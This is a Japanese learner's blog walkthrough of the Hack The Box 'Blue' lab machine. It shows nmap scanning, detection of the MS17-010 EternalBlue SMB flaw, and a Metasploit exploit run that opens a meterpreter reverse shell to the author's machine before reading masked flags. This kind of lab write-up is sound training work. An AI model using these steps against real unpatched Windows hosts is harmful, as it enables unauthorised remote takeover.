hack the box ~魔法使いへの道~ (その22) 【Walkthrough】Blue

htb

はじめに

今後の世界で生き残るために魔法使いを目指して頑張るエンジニアの日記です.

~魔法使い(ウィザード級ハッカー)への道~初心者エンジニアの積み上げ日記
ハッカーの中でも特に優れた上級ハッカーのことをウィザード級ハッカーと言われています.これは魔法使いの意味でコンピュータを自在に操る者とのことでこの名前が付けられています.そこで本企画は初心者が魔法使いになるまでの道のりを綴っていこうと思います.

今回の内容

hack the box のBeginner Trackの最後のマシンを攻略していきます.

情報収集

いつも通りNMAPをしていきます.

┌──(maki㉿kali)-[~]
└─$ sudo nmap 10.10.10.40
[sudo] password for maki: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-09 12:08 JST
Nmap scan report for 10.10.10.40
Host is up (0.28s latency).
Not shown: 991 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 7.68 seconds

あやしいものが複数でてきたの,詳細にスキャンします.

┌──(maki㉿kali)-[~]
└─$ sudo nmap 10.10.10.40 -A -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-09 12:13 JST
Nmap scan report for 10.10.10.40
Host is up (0.26s latency).
Not shown: 991 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=9/9%OT=135%CT=1%CU=36073%PV=Y%DS=2%DC=T%G=Y%TM=631AAFA
OS:D%P=x86_64-pc-linux-gnu)SEQ(SP=FC%GCD=2%ISR=103%TI=I%CI=I%II=I%SS=S%TS=7
OS:)OPS(O1=M539NW8ST11%O2=M539NW8ST11%O3=M539NW8NNT11%O4=M539NW8ST11%O5=M53
OS:9NW8ST11%O6=M539ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000
OS:)ECN(R=Y%DF=Y%T=80%W=2000%O=M539NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+
OS:%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T
OS:=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S
OS:=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2022-09-09T03:13:31
|_  start_date: 2022-09-08T21:03:51
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-09-09T04:13:30+01:00
|_clock-skew: mean: -21m11s, deviation: 34m36s, median: -1m13s

TRACEROUTE (using port 5900/tcp)
HOP RTT       ADDRESS
1   264.67 ms 10.10.14.1
2   273.31 ms 10.10.10.40

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.04 seconds

┌──(maki㉿kali)-[~]
└─$ 

ここで脆弱性があるものがないか調べます.

┌──(maki㉿kali)-[~]
└─$ nmap -Pn -script smb-vuln* -p 445 10.10.10.40
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-09 12:20 JST
Nmap scan report for 10.10.10.40
Host is up (0.26s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND

Nmap done: 1 IP address (1 host up) scanned in 15.58 seconds

怪しいものを発見しました.

これは「EternalBlue」と呼ばれる脆弱性です.

EternalBlue

EternalBlueは別称MS17-010であり、エクスプロイトの一つです。

サーバで利用される通信プロトコルであるSMB(Server Message Block)の遠隔操作コードを実行する際の脆弱性です。
攻撃者はEternalBlueを悪用することで、SMBを使用するシステムの権限に遠隔操作が可能になります。
また、遠隔操作可能でありユーザ側の操作を必要としない為、システム権限を悪用し攻撃対象のコントロールを得ることで、LAN(ローカルネットワーク)において自由に活動、つまりはマルウェアを拡散することができます。
このことから、脆弱性を抱えたすべてのWindowsOSや、EternalBlueのセキュリティパッチを適用していないシステムを対象にランサムウェアの拡散が成立します。

攻撃準備

msfconsoleの起動


┌──(maki㉿kali)-[~]
└─$ msfconsole

                 _---------.                                                                                                                   
             .' #######   ;."                                                                                                                  
  .---,.    ;@             @@`;   .---,..                                                                                                      
." @@@@@'.,'@@            @@@@@',.'@@@@ ".                                                                                                     
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;                                                                                                     
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'                                                                                                     
     "--'.@@@  -.@        @ ,'-   .'--"                                                                                                        
          ".@' ; @       @ `.  ;'                                                                                                              
            |@@@@ @@@     @    .                                                                                                               
             ' @@@ @@   @@    ,                                                                                                                
              `.@@@@    @@   .                                                                                                                 
                ',@@     @   ;           _____________                                                                                         
                 (   3 C    )     /|___ / Metasploit! \                                                                                        
                 ;@'. __*__,."    \|--- \_____________/                                                                                        
                  '(.,...."/                                                                                                                   

       =[ metasploit v6.1.39-dev                          ]
+ -- --=[ 2214 exploits - 1171 auxiliary - 396 post       ]
+ -- --=[ 616 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: To save all commands executed since start up 
to a file, use the makerc command

msf6 > 

モジュールの検索

EternalBlueの別称MS17-010で検索してみます.

msf6 > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > options

モジュールの選択

Descriptionから0番を選択します.

msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

必要オプションの確認

msf6 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework
                                             /wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects
                                             Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target
                                             machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Wind
                                             ows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target mach
                                             ines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server
                                              2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.155    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

オプションの設定

対象のIPと自分のPCのIPを選択します.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.10.40
rhosts => 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.14.8
lhost => 10.10.14.8

オプションの確認

きちんと反映されているか確認してみます.

msf6 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         10.10.10.40      yes       The target host(s), see https://github.com/rapid7/metasploit-framework
                                             /wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects
                                             Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target
                                             machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Wind
                                             ows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target mach
                                             ines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server
                                              2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.8       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

攻撃

ここから攻撃します.

もし,この手順でリバースシェルを受け取ることができない人はこちらのサイトを見てみてください.

hack the box ~魔法使いへの道~ (その21) VirtualBoxでリバースシェルを受け取る方法
リバースシェルを使って攻撃したところ,ローカルのノートPCではリバースシェルを受け取ることができましたが,VirtualBoxでは受け取ることができませんでした.今回はそれを解決していきます.
sf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.10.14.8:4444 
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[-] 10.10.10.40:445       - Rex::ConnectionTimeout: The connection with (10.10.10.40:445) timed out.
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[-] 10.10.10.40:445 - The target is not vulnerable.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.10.14.8:4444 
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.10.10.40
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.40:49158 ) at 2022-09-09 14:37:05 +0900
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

ファイル探索

ここから2つのファイルを探しにいきます.
基本的にデスクトップに置いてかることが多いのでそこを探しにいってみてください.

ユーザフラッグ

meterpreter > ls
Listing: C:\Windows\system32
============================

Mode              Size       Type  Last modified              Name
----              ----       ----  -------------              ----
040777/rwxrwxrwx  0          dir   2011-04-12 16:45:18 +0900  0409
100666/rw-rw-rw-  25072      fil   2022-09-09 14:35:04 +0900  7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A2
                                                              89-439d-8115-601632D005A0
100666/rw-rw-rw-  25072      fil   2022-09-09 14:35:04 +0900  7B296FB0-376B-497e-B012-+++++++++++++++meterpreter > cd /
meterpreter > ls
Listing: C:\
============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
040777/rwxrwxrwx  0      dir   2017-07-21 15:56:27 +0900  $Recycle.Bin
040777/rwxrwxrwx  0      dir   2022-02-19 00:11:31 +0900  Config.Msi
040777/rwxrwxrwx  0      dir   2009-07-14 14:08:56 +0900  Documents and Settings
040777/rwxrwxrwx  0      dir   2009-07-14 12:20:08 +0900  PerfLogs
040555/r-xr-xr-x  4096   dir   2022-02-19 00:02:50 +0900  Program Files
040555/r-xr-xr-x  4096   dir   2017-07-15 01:58:41 +0900  Program Files (x86)
040777/rwxrwxrwx  4096   dir   2017-12-24 11:23:01 +0900  ProgramData
040777/rwxrwxrwx  0      dir   2022-02-18 23:09:14 +0900  Recovery
040777/rwxrwxrwx  0      dir   2017-07-14 22:48:44 +0900  Share
040777/rwxrwxrwx  4096   dir   2022-02-19 00:02:22 +0900  System Volume Information
040555/r-xr-xr-x  4096   dir   2017-07-21 15:56:23 +0900  Users
040777/rwxrwxrwx  16384  dir   2022-02-19 00:32:41 +0900  Windows
000000/---------  0      fif   1970-01-01 09:00:00 +0900  pagefile.sys

meterpreter > cd Users
meterpreter > ls
Listing: C:\Users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040777/rwxrwxrwx  8192  dir   2017-07-21 15:56:36 +0900  Administrator
040777/rwxrwxrwx  0     dir   2009-07-14 14:08:56 +0900  All Users
040555/r-xr-xr-x  8192  dir   2009-07-14 16:07:31 +0900  Default
040777/rwxrwxrwx  0     dir   2009-07-14 14:08:56 +0900  Default User
040555/r-xr-xr-x  4096  dir   2011-04-12 16:51:29 +0900  Public
100666/rw-rw-rw-  174   fil   2009-07-14 13:54:24 +0900  desktop.ini
040777/rwxrwxrwx  8192  dir   2017-07-14 22:45:53 +0900  haris

meterpreter > cd haris
meterpreter > ls
Listing: C:\Users\haris
=======================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  AppData
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  Application Data
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Contacts
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  Cookies
040555/r-xr-xr-x  0       dir   2017-12-24 11:23:23 +0900  Desktop
040555/r-xr-xr-x  4096    dir   2017-07-15 16:58:33 +0900  Documents
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Downloads
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Favorites
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Links
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  Local Settings
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Music
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  My Documents
100666/rw-rw-rw-  524288  fil   2021-01-15 18:41:00 +0900  NTUSER.DAT
100666/rw-rw-rw-  65536   fil   2017-07-14 23:03:15 +0900  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw-  524288  fil   2017-07-14 23:03:15 +0900  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMConta
                                                           iner00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288  fil   2017-07-14 23:03:15 +0900  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMConta
                                                           iner00000000000000000002.regtrans-ms
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  NetHood
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:32 +0900  Pictures
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  PrintHood
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  Recent
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Saved Games
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Searches
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  SendTo
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  Start Menu
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  Templates
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:32 +0900  Videos
100666/rw-rw-rw-  262144  fil   2022-02-19 00:02:40 +0900  ntuser.dat.LOG1
100666/rw-rw-rw-  0       fil   2017-07-14 22:45:36 +0900  ntuser.dat.LOG2
100666/rw-rw-rw-  20      fil   2017-07-14 22:45:37 +0900  ntuser.ini

meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\haris\Desktop
===============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2017-07-15 16:58:32 +0900  desktop.ini
100444/r--r--r--  34    fil   2022-09-09 14:33:22 +0900  user.txt

meterpreter > cat user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

ルートフラッグ

meterpreter > cd ..
meterpreter > ls
Listing: C:\Users\haris
=======================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  AppData
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  Application Data
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Contacts
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  Cookies
040555/r-xr-xr-x  0       dir   2017-12-24 11:23:23 +0900  Desktop
040555/r-xr-xr-x  4096    dir   2017-07-15 16:58:33 +0900  Documents
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Downloads
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Favorites
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Links
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  Local Settings
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Music
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  My Documents
100666/rw-rw-rw-  524288  fil   2021-01-15 18:41:00 +0900  NTUSER.DAT
100666/rw-rw-rw-  65536   fil   2017-07-14 23:03:15 +0900  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw-  524288  fil   2017-07-14 23:03:15 +0900  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMConta
                                                           iner00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288  fil   2017-07-14 23:03:15 +0900  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMConta
                                                           iner00000000000000000002.regtrans-ms
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  NetHood
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:32 +0900  Pictures
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  PrintHood
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  Recent
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Saved Games
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:33 +0900  Searches
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  SendTo
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  Start Menu
040777/rwxrwxrwx  0       dir   2017-07-14 22:45:37 +0900  Templates
040555/r-xr-xr-x  0       dir   2017-07-15 16:58:32 +0900  Videos
100666/rw-rw-rw-  262144  fil   2022-02-19 00:02:40 +0900  ntuser.dat.LOG1
100666/rw-rw-rw-  0       fil   2017-07-14 22:45:36 +0900  ntuser.dat.LOG2
100666/rw-rw-rw-  20      fil   2017-07-14 22:45:37 +0900  ntuser.ini

meterpreter > cd ..
meterpreter > ls
Listing: C:\Users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040777/rwxrwxrwx  8192  dir   2017-07-21 15:56:36 +0900  Administrator
040777/rwxrwxrwx  0     dir   2009-07-14 14:08:56 +0900  All Users
040555/r-xr-xr-x  8192  dir   2009-07-14 16:07:31 +0900  Default
040777/rwxrwxrwx  0     dir   2009-07-14 14:08:56 +0900  Default User
040555/r-xr-xr-x  4096  dir   2011-04-12 16:51:29 +0900  Public
100666/rw-rw-rw-  174   fil   2009-07-14 13:54:24 +0900  desktop.ini
040777/rwxrwxrwx  8192  dir   2017-07-14 22:45:53 +0900  haris

meterpreter > cd Administrator
meterpreter > ls
Listing: C:\Users\Administrator
===============================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
040777/rwxrwxrwx  0       dir   2017-07-21 15:56:24 +0900  AppData
040777/rwxrwxrwx  0       dir   2017-07-21 15:56:24 +0900  Application Data
040555/r-xr-xr-x  0       dir   2017-07-21 15:56:40 +0900  Contacts
040777/rwxrwxrwx  0       dir   2017-07-21 15:56:24 +0900  Cookies
040555/r-xr-xr-x  0       dir   2017-12-24 11:22:48 +0900  Desktop
040555/r-xr-xr-x  4096    dir   2017-07-21 15:56:40 +0900  Documents
040555/r-xr-xr-x  0       dir   2022-02-19 00:21:10 +0900  Downloads
040555/r-xr-xr-x  0       dir   2017-07-21 15:56:42 +0900  Favorites
040555/r-xr-xr-x  0       dir   2017-07-21 15:56:40 +0900  Links
040777/rwxrwxrwx  0       dir   2017-07-21 15:56:24 +0900  Local Settings
040555/r-xr-xr-x  0       dir   2017-07-21 15:56:40 +0900  Music
040777/rwxrwxrwx  0       dir   2017-07-21 15:56:24 +0900  My Documents
100666/rw-rw-rw-  786432  fil   2022-09-09 14:33:28 +0900  NTUSER.DAT
100666/rw-rw-rw-  65536   fil   2017-07-21 15:57:29 +0900  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw-  524288  fil   2017-07-21 15:57:29 +0900  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMConta
                                                           iner00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288  fil   2017-07-21 15:57:29 +0900  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMConta
                                                           iner00000000000000000002.regtrans-ms
040777/rwxrwxrwx  0       dir   2017-07-21 15:56:24 +0900  NetHood
040555/r-xr-xr-x  0       dir   2017-07-21 15:56:40 +0900  Pictures
040777/rwxrwxrwx  0       dir   2017-07-21 15:56:24 +0900  PrintHood
040777/rwxrwxrwx  0       dir   2017-07-21 15:56:24 +0900  Recent
040555/r-xr-xr-x  0       dir   2017-07-21 15:56:40 +0900  Saved Games
040555/r-xr-xr-x  0       dir   2017-07-21 15:56:40 +0900  Searches
040777/rwxrwxrwx  0       dir   2017-07-21 15:56:24 +0900  SendTo
040777/rwxrwxrwx  0       dir   2017-07-21 15:56:24 +0900  Start Menu
040777/rwxrwxrwx  0       dir   2017-07-21 15:56:24 +0900  Templates
040555/r-xr-xr-x  0       dir   2017-07-21 15:56:40 +0900  Videos
100666/rw-rw-rw-  262144  fil   2022-09-09 14:33:28 +0900  ntuser.dat.LOG1
100666/rw-rw-rw-  0       fil   2017-07-21 15:56:24 +0900  ntuser.dat.LOG2
100666/rw-rw-rw-  20      fil   2017-07-21 15:56:24 +0900  ntuser.ini

meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2017-07-21 15:56:40 +0900  desktop.ini
100444/r--r--r--  34    fil   2022-09-09 14:33:22 +0900  root.txt

meterpreter > cat root.txt
YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
meterpreter > 

おわりに

VirtualBoxの設定でリバースシェルを受け取れない問題が発生して大変でしたが何とかクリアしました.

これでBeginner Trackを完走できました.
想像よりも大変でしたが達成感が半端じゃないです.

これからも奮っていきます.

コメント

タイトルとURLをコピーしました